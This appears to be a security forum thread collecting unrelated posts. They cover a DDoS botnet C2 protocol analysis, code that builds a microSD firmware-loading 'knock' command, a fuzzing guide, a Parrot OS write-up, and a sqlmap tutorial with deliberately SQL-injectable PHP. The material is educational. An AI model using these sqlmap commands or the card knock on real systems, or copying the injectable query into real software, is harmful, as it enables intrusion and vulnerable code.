As I mentioned earlier in the post, I have yet to see any DoS-related traffic from this sample. I'm also not aware of DoS activity being seen by other researchers. If anyone has learned otherwise, I'd love to hear from you!
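To make the observed C2 layout concrete, here is a small Python sketch that extracts the fields noted in this analysis from a 75-byte C2 message and a 27-byte bot reply. The field names are my own labels for the author's observations, not a reverse-engineered protocol definition.

```python
# Sketch of the observed C2 message layout. Offsets are taken from the
# pcap observations in the post; the field names are hypothetical.

C2_MSG_LEN = 75   # C2 -> bot command
REPLY_LEN = 27    # bot -> C2 reply

def parse_c2_message(data: bytes) -> dict:
    """Pull out the bytes the post identifies as meaningful."""
    if len(data) != C2_MSG_LEN:
        raise ValueError("expected a 75-byte C2 message")
    return {
        "counter": data[9],               # increments by one per message
        "variant": (data[28], data[71]),  # initially alternate 0xC6/0xC7
    }

def parse_bot_reply(data: bytes) -> int:
    """Return the byte at decimal offset 19, seen varying between 0 and 2."""
    if len(data) != REPLY_LEN:
        raise ValueError("expected a 27-byte reply")
    return data[19]

# One of the captured sequences quoted in the post:
sample = bytes.fromhex(
    "01:00:00:00:43:00:00:00:00:fd:05:00:00:00:00:00:00:01:00:00:00:"
    "01:00:00:00:80:d4:07:c6:9c:50:00:01:00:00:00:00:00:00:00:1e:00:"
    "00:00:00:04:00:00:00:04:00:00:10:27:60:ea:ac:f5:a5:8f:ac:f5:a5:"
    "8f:00:00:00:00:00:d4:07:c6:9c:50:00".replace(":", "")
)
info = parse_c2_message(sample)  # counter == 0xfd for this capture
```

Running this over consecutive messages from the pcap should show the counter byte stepping by one, matching the behaviour described above.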
References:
- Packet capture of initial malware download and execution - disknyp.pcap, 4.1 MB - MD5 hash: 4fb44dfa3d98e17f13c6befd55787582
- Memory image of Ubuntu Server infected with 'disknyp' - linux_disknyp.zip, 167 MB - MD5 hash of unzipped .vmem: 04831ad2fbd089c2c5b7b8dc657d0e7a (Linux Volatility profile: LinuxUbuntu1004_pae32-33x86)

Posted by Andre M. DiMino at 4:36 PM
Source: Andre' M. DiMino - SemperSecurus: Another look at a cross-platform DDoS botnet
  13. [h=1]PENETRATION TESTING PRACTICE LAB - VULNERABLE APPS / SYSTEMS[/h]The following table gives the URLs of all the vulnerable web applications, operating system installations, old software and war games [hacking] sites. The URLs for individual applications that are part of other collections are not given, as it is not necessary to download and manually configure each of them if they are already available in a configured state. For the technologies used in each web application, please refer to the mindmap above. http://www.amanhardikar.com/mindmaps/PracticeUrls.html
  14. On Hacking MicroSD Cards Today at the Chaos Computer Congress (30C3), xobs and I disclosed a finding that some SD cards contain vulnerabilities that allow arbitrary code execution — on the memory card itself. On the dark side, code execution on the memory card enables a class of MITM (man-in-the-middle) attacks, where the card seems to be behaving one way, but in fact it does something else. On the light side, it also enables the possibility for hardware enthusiasts to gain access to a very cheap and ubiquitous source of microcontrollers. In order to explain the hack, it’s necessary to understand the structure of an SD card. The information here applies to the whole family of “managed flash” devices, including microSD, SD, MMC as well as the eMMC and iNAND devices typically soldered onto the mainboards of smartphones and used to store the OS and other private user data. We also note that similar classes of vulnerabilities exist in related devices, such as USB flash drives and SSDs. Flash memory is really cheap. So cheap, in fact, that it’s too good to be true. In reality, all flash memory is riddled with defects — without exception. The illusion of a contiguous, reliable storage media is crafted through sophisticated error correction and bad block management functions. This is the result of a constant arms race between the engineers and mother nature; with every fabrication process shrink, memory becomes cheaper but more unreliable. Likewise, with every generation, the engineers come up with more sophisticated and complicated algorithms to compensate for mother nature’s propensity for entropy and randomness at the atomic scale. These algorithms are too complicated and too device-specific to be run at the application or OS level, and so it turns out that every flash memory disk ships with a reasonably powerful microcontroller to run a custom set of disk abstraction algorithms. 
Even the diminutive microSD card contains not one, but at least two chips — a controller, and at least one flash chip (high density cards will stack multiple flash die). You can see some die shots of the inside of microSD cards at a microSD teardown I did a couple years ago. In our experience, the quality of the flash chip(s) integrated into memory cards varies widely. It can be anything from high-grade factory-new silicon to material with over 80% bad sectors. Those concerned about e-waste may (or may not) be pleased to know that it’s also common for vendors to use recycled flash chips salvaged from discarded parts. Larger vendors will tend to offer more consistent quality, but even the largest players staunchly reserve the right to mix and match flash chips with different controllers, yet sell the assembly as the same part number — a nightmare if you’re dealing with implementation-specific bugs. The embedded microcontroller is typically a heavily modified 8051 or ARM CPU. In modern implementations, the microcontroller will approach 100 MHz performance levels, and also have several hardware accelerators on-die. Amazingly, the cost of adding these controllers to the device is probably on the order of $0.15-$0.30, particularly for companies that can fab both the flash memory and the controllers within the same business unit. It’s probably cheaper to add these microcontrollers than to thoroughly test and characterize each flash memory chip, which explains why managed flash devices can be cheaper per bit than raw flash chips, despite the inclusion of a microcontroller. The downside of all this complexity is that there can be bugs in the hardware abstraction layer, especially since every flash implementation has unique algorithmic requirements, leading to an explosion in the number of hardware abstraction layers that a microcontroller has to potentially handle. 
The inevitable firmware bugs are now a reality of the flash memory business, and as a result it’s not feasible, particularly for third party controllers, to indelibly burn a static body of code into on-chip ROM. The crux is that a firmware loading and update mechanism is virtually mandatory, especially for third-party controllers. End users are rarely exposed to this process, since it all happens in the factory, but this doesn’t make the mechanism any less real. In my explorations of the electronics markets in China, I’ve seen shopkeepers burning firmware on cards that “expand” the capacity of the card — in other words, they load a firmware that reports the capacity of a card is much larger than the actual available storage. The fact that this is possible at the point of sale means that most likely, the update mechanism is not secured. In our talk at 30C3, we report our findings exploring a particular microcontroller brand, namely, Appotech and its AX211 and AX215 offerings. We discover a simple “knock” sequence transmitted over manufacturer-reserved commands (namely, CMD63 followed by 'A','P','P','O') that drops the controller into a firmware loading mode. At this point, the card will accept the next 512 bytes and run them as code. From this beachhead, we were able to reverse engineer (via a combination of code analysis and fuzzing) most of the 8051’s function-specific registers, enabling us to develop novel applications for the controller, without any access to the manufacturer’s proprietary documentation. Most of this work was done using our open source hardware platform, Novena, and a set of custom flex circuit adapter cards (which, tangentially, led toward the development of flexible circuit stickers aka chibitronics). Significantly, the SD command processing is done via a set of interrupt-driven callbacks processed by the microcontroller. These callbacks are an ideal location to implement an MITM attack.
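As an illustration, the "knock" can be framed as a standard 48-bit SD command. This is a hedged sketch: the talk only states that CMD63 is followed by the ASCII bytes 'A','P','P','O'; packing those bytes into the command's 32-bit argument field, and whether the controller checks the CRC on a vendor command at all, are my assumptions.

```python
def crc7(data: bytes) -> int:
    """CRC-7 over a command frame (polynomial x^7 + x^3 + 1),
    as used by standard SD commands."""
    crc = 0
    for byte in data:
        for i in range(7, -1, -1):
            bit = (byte >> i) & 1
            top = (crc >> 6) & 1
            crc = (crc << 1) & 0x7F
            if top ^ bit:
                crc ^= 0x09
    return crc

def sd_command(index: int, arg: bytes) -> bytes:
    """Build a 48-bit SD command frame: start/transmission bits plus a
    6-bit command index, a 32-bit argument, then CRC-7 and the end bit."""
    assert 0 <= index < 64 and len(arg) == 4
    frame = bytes([0x40 | index]) + arg
    return frame + bytes([(crc7(frame) << 1) | 0x01])

# Hypothetical knock: CMD63 carrying 'A','P','P','O' as its argument.
knock = sd_command(63, b"APPO")
```

On real hardware the frame would be clocked out over the SD bus (the talk used the Novena platform and custom adapter boards for this); the sketch only shows how such a vendor command could be assembled.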
It’s as yet unclear how many other manufacturers leave their firmware updating sequences unsecured. Appotech is a relatively minor player in the SD controller world; there’s a handful of companies that you’ve probably never heard of that produce SD controllers, including Alcor Micro, Skymedi, Phison, SMI, and of course Sandisk and Samsung. Each of them would have different mechanisms and methods for loading and updating their firmwares. However, it’s been previously noted that at least one Samsung eMMC implementation using an ARM instruction set had a bug which required a firmware updater to be pushed to Android devices, indicating yet another potentially promising avenue for further discovery. From the security perspective, our findings indicate that even though memory cards look inert, they run a body of code that can be modified to perform a class of MITM attacks that could be difficult to detect; there is no standard protocol or method to inspect and attest to the contents of the code running on the memory card’s microcontroller. Those in high-risk, high-sensitivity situations should assume that a “secure-erase” of a card is insufficient to guarantee the complete erasure of sensitive data. Therefore, it’s recommended to dispose of memory cards through total physical destruction (e.g., grind them up with a mortar and pestle). From the DIY and hacker perspective, our findings indicate a potentially interesting source of cheap and powerful microcontrollers for use in simple projects. An Arduino, with its 8-bit 16 MHz microcontroller, will set you back around $20. A microSD card with several gigabytes of memory and a microcontroller with several times the performance could be purchased for a fraction of the price. While SD cards are admittedly I/O-limited, some clever hacking of the microcontroller in an SD card could make for a very economical and compact data logging solution for I2C or SPI-based sensors.
Slides from our talk at 30C3 can be downloaded here, or you can watch the talk on YouTube below. Team Kosagi would like to extend a special thanks to .mudge for enabling this research through the Cyber Fast Track program. Tags: flash, hacking, microcontroller, microsd, mitm Source: On Hacking MicroSD Cards
  15. 15 minute guide to fuzzing

Matt Hillman
August 08, 2013

Have you heard about fuzzing but are not sure what it is or if you should do it? This guide should quickly get you up to speed on what it's all about.

What is fuzzing?

Fuzzing is a way of discovering bugs in software by providing randomised inputs to programs to find test cases that cause a crash. Fuzzing your programs can give you a quick view of their overall robustness and help you find and fix critical bugs. Fuzzing is ultimately a black-box technique, requiring no access to source code, but it can still be used against software for which you do have source code, because it will potentially find bugs more quickly and avoid the need to review lots of code. Once a crash is detected, if you have the source code, it should become much easier to fix.

Pros and cons of fuzzing

Fuzzing can be very useful, but it is no silver bullet. Here are some of the pros and cons of fuzzing:

Pros
- Can provide results with little effort: once a fuzzer is up and running, it can be left for hours, days or months to look for bugs with no interaction
- Can reveal bugs that were missed in a manual audit
- Provides an overall picture of the robustness of the target software

Cons
- Will not find all bugs: fuzzing may miss bugs that do not trigger a full program crash, and may be less likely to trigger bugs that are only triggered in highly specific circumstances
- The crashing test cases that are produced may be difficult to analyse, as the act of fuzzing does not give you much knowledge of how the software operates internally
- Programs with complex inputs can require much more work to produce a smart enough fuzzer to get sufficient code coverage

Smart and dumb fuzzing

Fuzzers provide random input to software. This may be in the form of a network protocol, a file of a certain format or direct user input.
The fuzzed input can be completely random with no knowledge of what the expected input should look like, or it can be created to look like valid input with some alterations. A fuzzer that generates completely random input is known as a “dumb” fuzzer, as it has no built-in intelligence about the program it is fuzzing. A dumb fuzzer requires the smallest amount of work to produce (it could be as simplistic as piping /dev/random into a program). This small amount of work can produce results for very little cost – one of fuzzing’s big advantages. However, sometimes a program will only perform certain processing if particular aspects of the input are present. For example, a program may accept a “name” field in its input, and this field may have a “name length” associated with it. If these fields are not present in a form that is valid enough for the program to identify, it may never attempt to read the name. However, if these fields are present in a valid form, but the length value is set to the incorrect value, the program may read beyond the buffer containing the name and trigger a crash. Without input that is at least partly valid, this is very unlikely to happen. In these cases, “smart” fuzzers can be used. These are programmed with knowledge of the input format (i.e. a protocol definition or rules for a file format). The fuzzer can then construct mostly valid input and only fuzz parts of the input within that basic format. The greater the level of intelligence that you build into a fuzzer, the deeper you may be able to go into a protocol or file format’s processing, but the more work you create for yourself. A balance needs to be found between these two extremes. It can be good to begin with a much more dumb fuzzer and increase its intelligence as the code quality of the software you are testing increases. 
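As a concrete illustration of the dumb, mutation-style approach just described, here is a minimal Python sketch. The names and parameters are hypothetical, not taken from any particular tool:

```python
import random

def dumb_mutate(sample: bytes, ratio: float = 0.01, seed=None) -> bytes:
    """Corrupt a small fraction of a valid sample input at random.

    No knowledge of the input format is used: this is "dumb" fuzzing.
    Passing a seed makes the mutation reproducible.
    """
    rng = random.Random(seed)
    data = bytearray(sample)
    for _ in range(max(1, int(len(data) * ratio))):
        data[rng.randrange(len(data))] = rng.randrange(256)
    return bytes(data)

# Each call yields one test case to feed to the target program:
case = dumb_mutate(b"GET /index.html HTTP/1.0\r\n\r\n", ratio=0.1, seed=42)
```

Because most of each test case is still a valid sample, even this format-unaware mutation can reach a surprising amount of the target's parsing code.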
If you get lots of crashes with a simplistic fuzzer, there is no point spending a long time making it more intelligent until the code quality increases to a point where the code requires it.

Types of fuzzer

Broadly speaking, fuzzers can be split into two categories based on how they create input to programs: mutation-based and generation-based. This section details those categories as well as offering a brief description of a more advanced technique called Evolutionary Fuzzing.

Mutation

Mutation-based fuzzers are arguably one of the easier types of fuzzer to create. This technique suits dumb fuzzing but can be used with more intelligent fuzzers as well. With mutation, samples of valid input are mutated randomly to produce malformed input. A dumb mutation fuzzer can simply select a valid sample input and alter parts of it randomly. For many programs, this can provide a surprising amount of mileage, as inputs are often still similar enough to valid input that good code coverage can be achieved without the need for further intelligence. You can build in greater intelligence by allowing the fuzzer to do some level of parsing of the samples to ensure that it only modifies specific parts or that it does not break the overall structure of the input such that it is immediately rejected by the program. Some protocols or file formats incorporate checksums that will fail if the input is modified arbitrarily. A mutation-based fuzzer should usually fix these checksums so that the input is accepted for processing; otherwise the only code tested is the checksum validation and nothing else. Two useful techniques that can be used by mutation-based fuzzers are described below.

Replay

A fuzzer can take saved sample inputs and simply replay them after mutating them. This works well for file format fuzzing, where a number of sample files can be saved and fuzzed to provide to the target program.
Simple or stateless network protocols can also be fuzzed effectively with replay, as the fuzzer will not need to make lots of legitimate requests to get deep into the protocol. For a more complex protocol, replay may be more difficult, as the fuzzer may need to respond in a dynamic way to the program to allow processing to continue deep into the protocol, or the protocol may simply be inherently non-replayable.

Man-in-the-Middle or Proxy

You may have heard of Man-in-the-Middle (MITM) as a technique used by penetration testers and hackers, but it can also be used for mutation-based network protocol fuzzing. MITM describes the situation where you place yourself in the middle of a client and server (or two clients in the case of peer-to-peer networking), intercepting and possibly modifying messages passed between them. In this way, you are acting like a proxy between the two. The term MITM is generally used when it is not expected that you will be acting like a proxy, but for our purposes the terms are largely interchangeable. By setting your fuzzer up as a proxy, it can mutate requests or responses depending on whether you are fuzzing the server or the client. Again, the fuzzer could have no intelligence about the protocol and simply randomly alter some requests and not others, or it could intelligently target requests at the specific level of the protocol in which you are interested. Proxy-based fuzzing can allow you to take an existing deployment of a networked program and quickly insert a fuzzing layer into it, without needing to make your fuzzer act like a client or server itself.

Generation

Generation-based fuzzers actually generate input from scratch rather than mutating existing input. Generation-based fuzzers usually require some level of intelligence in order to construct input that makes at least some sense to the program, although generating completely random data would also technically be generation.
Generation fuzzers often split a protocol or file format into chunks, which they can build up in a valid order, randomly fuzzing some of those chunks independently. This can create inputs that preserve their overall structure but contain inconsistent data within that structure. The granularity of these chunks and the intelligence with which they are constructed define the level of intelligence of the fuzzer. While mutation-based fuzzing can have a similar effect to generation fuzzing (as, over time, mutations will be randomly applied without completely breaking the input's structure), generating inputs ensures that this will be so. Generation fuzzing can also get deeper into a protocol more easily, as it can construct valid sequences of inputs, applying fuzzing only to specific parts of that communication. It also allows the fuzzer to act as a true client/server, generating correct, dynamic responses where these cannot be blindly replayed.

Evolutionary

Evolutionary fuzzing is an advanced technique, which we will only briefly describe here. It allows the fuzzer to use feedback from each test case to learn the format of the input over time. For example, by measuring the code coverage of each test case, the fuzzer can heuristically work out which properties of the test case exercise a given area of code, and it can gradually evolve a set of test cases that cover the majority of the program code. Evolutionary fuzzing often relies on techniques similar to genetic algorithms and may require some form of binary instrumentation to operate correctly.

What are you really fuzzing?

Even for relatively dumb fuzzers, it is important to keep in mind what part of the code your test cases are actually likely to hit.
To give a simple example, if you are fuzzing an application protocol that uses TCP/IP and your fuzzer randomly mutates a raw packet capture, you are likely to be corrupting the TCP/IP packets themselves, and your input is unlikely to get processed by the application at all. Or, if you were testing an OCR program that parsed images of text into real text, but you were mutating the whole of an image file, you could end up testing its image parsing code more often than the actual OCR code. If you wanted to target the OCR processing specifically, you might wish to keep the headers of the image file valid. Likewise, you may be generating input that is so random that it does not pass an initial sanity check in the program, or the code contains a checksum that you do not correct. You are then only testing that first branch in the program, never getting deeper into the program code.

Anatomy of a fuzzer

To operate effectively, a fuzzer needs to perform a number of important tasks:

- Generate test cases
- Record test cases or any information needed to reproduce them
- Interface with the target program to provide test cases as input
- Detect crashes

Fuzzers often split many of these tasks out into separate modules, for example having one library that can mutate data or generate it based on a definition, and another to provide test cases to the target program, and so on. Below are some notes on each of these tasks.

Test case generation

Generating test cases will vary depending on whether mutation-based or generation-based fuzzing is being employed. With either, there will be something that needs randomly transforming, whether it is a field of a particular type or an arbitrary chunk of data. These transformations can be completely random, but it is worth remembering that edge and corner cases can often be the source of bugs in programs.
As such, you may wish to favour such cases and include values such as:

- Very long or completely blank strings
- Maximum and minimum values for integers on the platform
- Values like -1, 0, 1 and 2

Depending on what you are fuzzing, there may be specific values or characters that are more likely to trigger bugs. For example:

- Null characters
- New line characters
- Semi-colons
- Format string values (%n, %s, etc.)
- Application specific keywords

Reproducibility

The simplest way to reproduce a test case is to record the exact input used when a crash is detected. However, there are other ways to ensure reproducibility that can be more convenient in certain circumstances. One way to do this is to store the initial seed used for the random component of test case generation, and ensure that all subsequent random behaviour follows a path that can be traced back to that seed. By re-running the fuzzer with the same seed, the behaviour should be reproducible. For example, you may only record the test case number and the initial seed and then quickly re-execute generation with that seed until you reach the given test case. This technique can be useful when the target program may accumulate dependencies based on past inputs. Previous inputs may have caused the program to initialise various items in its memory that are required to be present to trigger the bug. In these situations, simply recording the crashing test case would not be sufficient to reproduce the bug.

Interfacing with the target

Interfacing with the target program to provide the fuzzed input is often straightforward. For network protocols, it may simply involve sending the test case over the network, or responding to a client request; for file formats, it may simply mean executing the program with a command line argument pointing to the test case.
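For the simple file-format case just described, interfacing can be sketched as a small harness that writes each test case to a file and runs the target on it. This is a hypothetical example; the return-code convention assumes a POSIX system, where a negative return code means the process died on a signal:

```python
import os
import subprocess
import sys
import tempfile

def run_testcase(target_argv, data: bytes, timeout: float = 5.0):
    """Hand one fuzzed test case to the target via a temp file.

    Returns the target's return code, or None if it hung past the
    timeout. On POSIX, a negative return code means the process was
    killed by a signal (e.g. -11 for SIGSEGV), i.e. a likely crash.
    """
    fd, path = tempfile.mkstemp(suffix=".fuzz")
    try:
        os.write(fd, data)
        os.close(fd)
        try:
            proc = subprocess.run(target_argv + [path],
                                  capture_output=True, timeout=timeout)
            return proc.returncode
        except subprocess.TimeoutExpired:
            return None  # unresponsive: treat as a hang
    finally:
        os.unlink(path)

# Demo against a trivially well-behaved "target":
ok = run_testcase([sys.executable, "-c", "import sys; sys.exit(0)"], b"data")
```

The same harness doubles as a crude crash detector: a nonzero or negative return code, or a `None` timeout result, flags the test case for closer inspection.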
However, sometimes the input is provided in a form that is not trivial to generate in an automated way, or scripting the program to execute each test case has a high overhead and proves to be very slow. Creative thinking in these cases can reveal ways to exercise the relevant piece of code with the right data. For example, this may be performed by instrumenting a program in memory to artificially execute a parsing function with the input provided as an argument entirely in memory. This can remove the need for the program to go through a lengthy loading procedure before each test case, and further speed increases can be obtained by having test cases generated and provided completely in memory rather than going via the hard drive.

Crash detection

Crash detection is critical for fuzzing. If you cannot accurately determine when a program has crashed, you will not be able to identify a test case as triggering a bug. There are a number of common ways to approach this:

Attach a debugger

This will provide you with the most accurate results, and you can script the debugger to provide you with a crash trace as soon as a crash is detected. However, having a debugger attached can slow programs significantly, and this can cause quite an overhead. The fewer test cases you can generate in a given period of time, the fewer chances you have of finding a crash.

See if the process disappears

Rather than attaching a debugger, you can simply see if the process ID of the target still exists on the system after executing the test case. If the process has disappeared, it probably crashed. You can re-run the test case in a debugger later if you want more information about the crash, and you can even do this automatically for each crash, while still avoiding the slowdown of having the debugger attached for every case.

Timeout

If the program normally responds to your test cases, you can set a timeout after which you assume the program has either crashed or frozen.
This can also detect bugs that cause the program to become unresponsive but not necessarily to terminate. Whichever method you use, the program should be restarted whenever it crashes or becomes unresponsive, in order to allow fuzzing to continue.

Fuzzing quality

There are a number of things you can do to measure or improve the quality of your fuzzing. While these are all good things to keep in mind, you may not need to bother with them all if you are already getting lots of unique crashes within a useful timeframe.

Speed

Possibly one of the most important factors in fuzzing is speed. How many test cases per second or minute can you run? Sensible values will of course depend on the target, but the more test cases you can execute, the more likely you are to find a crash in a given time period. Fuzzing is random, so every test case is like a lottery ticket, and you want as many of them as you can get. There are lots of things you can do to increase the speed of your test cases, such as improving the efficiency of your generation or mutation routines, parallelising test cases, decreasing timeouts or running programs in "headless" modes where they do not display a GUI. And of course, if you want to, you can simply buy faster kit!

Categorising crashes

Finding crashes is of course only the start of the process. Once you find a crashing test case, you will need to analyse it, work out what the bug is and either fix it or write an exploit for it, depending on your motivation. If you have thousands of crashing test cases, this can be quite daunting. By categorising crashes you can prioritise them according to which ones are most interesting to you. This can also help you identify when one test case is triggering the same bug as another, so you only keep the cases relating to unique crashes. In order to do this, you will need some automated information about the crash so you can make a decision.
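A crude way to automate that decision is to bucket crashes by a signature derived from whatever crash information you can collect, for example the top frames of a stack trace. The helper below is hypothetical; the trace format is simply whatever your debugger script emits:

```python
import collections
import hashlib

def bucket_id(crash_trace: str, frames: int = 3) -> str:
    """Collapse a crash trace to a coarse bucket key: a hash of its
    top few lines. Test cases landing in the same bucket are likely
    duplicates of the same underlying bug."""
    top = "\n".join(crash_trace.splitlines()[:frames])
    return hashlib.sha1(top.encode()).hexdigest()[:12]

# Keep one list of test cases per unique crash signature:
unique_crashes = collections.defaultdict(list)
# for case, trace in crashing_results:
#     unique_crashes[bucket_id(trace)].append(case)
```

Hashing only the top frames is a deliberate trade-off: registers and addresses vary between runs of the same bug, while the innermost call stack usually does not.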
Running the test case with the target attached to a debugger can provide a crash trace which you can parse to find values such as the exception type, register values, stack contents and so on. One tool by Microsoft which can help with this is called !exploitable (pronounced "bang exploitable"), which works with the WinDbg debugger to categorise crashes according to how exploitable it thinks the bug is.

Test case reduction

As fuzzing randomly alters input, it is common for a crashing test case to have multiple alterations which are not relevant to triggering the bug. Test case reduction is the act of narrowing down a test case to the minimum set of alterations from a valid input required to trigger the bug, so that you only need to focus on that part of the input in your analysis. This reduction can be performed manually, but it can also be performed automatically by the fuzzer. When a crashing test case is encountered, the fuzzer can re-execute the test case several times, gradually reducing the alterations made to the input until the smallest set of changes remains whilst still triggering the bug. This can simplify your analysis and may also help to categorise crashing test cases, as you will know precisely what parts of the input are affected.

Code coverage

Code coverage is a measure of how much of the program's code has been executed by the fuzzer. The idea is that the more coverage you get, the more of the program you have actually tested. Measuring code coverage can be tricky and often requires binary instrumentation to track which portions of code are being executed. You can also measure code coverage in different ways, such as by line, by basic block, by branch or by code path.
Code coverage is not a perfect measure with regards to fuzzing, as it is possible to execute code without revealing bugs in it, and there are often areas of code that almost never get executed, such as safety error checks that are unlikely to really be needed and are very unlikely to be interesting to us anyway. Nevertheless, some form of code coverage measurement can provide insight into what your fuzzer is triggering within the program, especially when your fuzzing is completely black box and you may not yet know much about the program's inner workings. Some tools and technologies that may help with code coverage include Pai Mei, Valgrind, DynamoRIO and DTrace.

Fuzzing frameworks

There are a number of existing frameworks that allow you to create fuzzers without having to work from scratch. Some of these frameworks are complex and it may still take a while to create a working fuzzer for your target; by contrast, others take a very simple approach. A selection of these frameworks and fuzzers is listed here for your reference:

Radamsa

Radamsa is designed to be easy to use and flexible. It attempts to "just work" for a variety of input types and contains a number of different fuzzing algorithms for mutation.

Sulley

Sulley provides a comprehensive generation framework, allowing structured data to be represented for generation-based fuzzing. It also contains components to help with recording test cases and detecting crashes.

Peach

The Peach framework can perform smart fuzzing for file formats and network protocols. It can perform both generation- and mutation-based fuzzing, and it contains components to help with modelling and monitoring the target.

SPIKE

SPIKE is a network protocol fuzzer. It requires good knowledge of C to use and is designed to run on Linux.

Grinder

Grinder is a web browser fuzzer, which also has features to help in managing large numbers of crashes.
NodeFuzz: a Node.js-based harness for web browsers, which includes instrumentation modules to gain further information from the client side. Sursa: https://www.mwrinfosecurity.com/knowledge-centre/15-minute-guide-to-fuzzing/
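Before committing to one of these frameworks, it can help to see how little a basic mutation fuzzer really is. The sketch below ties together the mutation and test-case-reduction loops described earlier; `crashes` is a hypothetical callback that runs the target on the given input and reports whether it crashed (for instance by checking the exit status under a debugger).

```python
import random

rng = random.Random()

def mutate(sample: bytes, max_mutations: int = 4) -> bytes:
    # Randomly overwrite a few bytes of a known-good sample input.
    data = bytearray(sample)
    for _ in range(rng.randint(1, max_mutations)):
        data[rng.randrange(len(data))] = rng.randrange(256)
    return bytes(data)

def reduce_test_case(sample: bytes, crashing: bytes, crashes) -> bytes:
    # Revert each altered byte back to the sample value; keep the reversion
    # whenever the crash still reproduces. What survives is the minimal set
    # of alterations needed to trigger the bug.
    reduced = bytearray(crashing)
    for i in range(len(reduced)):
        if reduced[i] != sample[i]:
            saved, reduced[i] = reduced[i], sample[i]
            if not crashes(bytes(reduced)):
                reduced[i] = saved          # still needed to crash: keep it
    return bytes(reduced)

def fuzz(sample: bytes, crashes, iterations: int = 10000):
    # Main loop: mutate, execute, and hand any crasher straight to the reducer.
    found = []
    for _ in range(iterations):
        case = mutate(sample)
        if crashes(case):
            found.append(reduce_test_case(sample, case, crashes))
    return found
```

A real harness replaces `crashes` with process execution and crash detection, but the control flow is exactly this.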
  16. [h=2]Web Shell: PHP Meterpreter[/h] Sursa: Web Shell: PHP Meterpreter
17. Meet Parrot Security OS (a Linux Distro) – Pentesting in the cloud! By Henry Dalziel Information Security Blogger Many of our regular readers and Hacker Hotshot community know by now that we enjoy covering news on Linux pentesting distros, and whilst the heavy hitters such as Kali Linux and BackBox tend to get most of the limelight, we particularly like exposing upcoming distros, and here is one certainly worth blogging about: Parrot Security OS. Linux penetration testing distros (call them hacking distros if you want) basically revolve around the same premise, i.e. storing 'best of breed' pentesting tools within an easy-to-use operating system that is efficiently updated. Now, the interesting thing about Parrot Security OS is that the team behind it have a novel way of using the cloud to manage the OS. We have to be honest in that we are not entirely sure how the cloud pentesting distro concept works – and for that reason we'd be grateful if any readers could chime in and drop a comment below to help improve this post. Here's what we do know about this distro, which does give the feeling that it is packing a punch. First off, it is based on Debian GNU/Linux mixed with Frozenbox OS and Kali Linux, to, in their own words, 'provide the best penetration and security testing experience.' Certainly, taking the Debian/Kali Linux route is a smart move, since it is a tried and tested platform that offers reliability. Another thing we do know is that the design of the distro, as you would expect from a bunch of Italian pentesters, looks very slick and easy on the eye – and let's be honest, that is important, because if you are anything like us you spend too much time in front of your monitors. Of interest, and on the subject of Italy, we note that several IT security distros hail from Italy, namely BackBox and CAINE (which is actually more of a forensics distro). Learn more and get a copy of Parrot 0.6 here.
Pentesting in the cloud This does intrigue us: how can the cloud be applied to a penetration tester's operating system? Does the OS fit into a particular cloud service model? As per the National Institute of Standards and Technology (NIST SP 800-145) definition, there are three cloud service models:

Infrastructure as a Service (IaaS): the provider supplies hardware and network connectivity. The tenant, on the other hand, is responsible for the virtual machine and the software stack that operates within it.

Platform as a Service (PaaS): the tenant supplies the web or database application (for example) that they would like to deploy, and the provider supplies all the necessary components required to run the app.

Software as a Service (SaaS): in this last category, the provider supplies the app and all the components necessary for its operation. SaaS is meant to be a 'quick fix' for the tenant.

In Summary We might be way off the mark here – and if we are, please let us know by dropping a comment below. We will be keeping an eye on Parrot Security OS, so please consider this your first introduction to what looks like a promising project – and don't forget where you heard it first! On the subject of penetration testing distros, we had an interesting Hacker Hotshot presentation from Andrew Hoog in which he discussed 'How To Turn BYOD Risk Into Mobile Security Strength'. The reason we bring that up is that Andrew is the co-founder of viaForensics and co-developer of Santoku, a distro that focuses on mobile forensics – another niche and interesting area of IT security. We wish the Parrot (Frozenbox) team all the best and look forward to hearing how the project develops. Sursa: Meet Parrot Security OS (a Linux Distro) - Pentesting in the cloud!
18. Sqlmap Tricks for Advanced SQL Injection Sqlmap is an awesome tool that automates SQL injection discovery and exploitation. I normally use it for exploitation only, because I prefer manual detection in order to avoid stressing the web server or being blocked by IPS/WAF devices. Below I provide a basic overview of sqlmap and some configuration tweaks for finding trickier injection points. Basics Using sqlmap for classic SQLi is very straightforward: ./sqlmap.py -u 'http://mywebsite.com/page.php?vulnparam=hello' The target URL after the -u option includes a parameter vulnerable to SQLi (vulnparam). Sqlmap will run a series of tests and detect it very quickly. You can also explicitly tell sqlmap to only test specific parameters with the -p option. This is useful when the query contains several parameters and you don't want sqlmap to test everything. You can use the --data option to pass any POST parameters. To maximize successful detection and exploitation, I usually use the --headers option to pass a valid User-Agent header (from my browser, for example). Finally, the --cookie option is used to send any useful cookie along with the queries (e.g. a session cookie). Advanced Attack Sometimes sqlmap cannot find tricky injection points and some configuration tweaks are needed. In this example, I will use the Damn Vulnerable Web App (DVWA - Damn Vulnerable Web Application), a deliberately insecure web application used for educational purposes. It uses PHP and a MySQL database. I also customized the source code to simulate a complex injection point.
Here is the source of the PHP file responsible for the Blind SQL Injection exercise, located at /[install_dir]/dvwa/vulnerabilities/sqli_blind/source/low.php: [phpcode]<?php
if (isset($_GET['Submit'])) {
    // Retrieve data
    $id = $_GET['id'];
    if (!preg_match('/-BR$/', $id))
        $html .= '<pre><h2>Wrong ID format</h2></pre>';
    else {
        $id = str_replace("-BR", "", $id);
        $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
        $result = mysql_query($getid); // Removed 'or die' to suppress mysql errors
        $num = @mysql_numrows($result); // The '@' character suppresses errors making the injection 'blind'
        if ($num > 0)
            $html .= '<pre><h2>User exists!</h2></pre>';
        else
            $html .= '<pre><h2>Unknown user!</h2></pre>';
    }
}
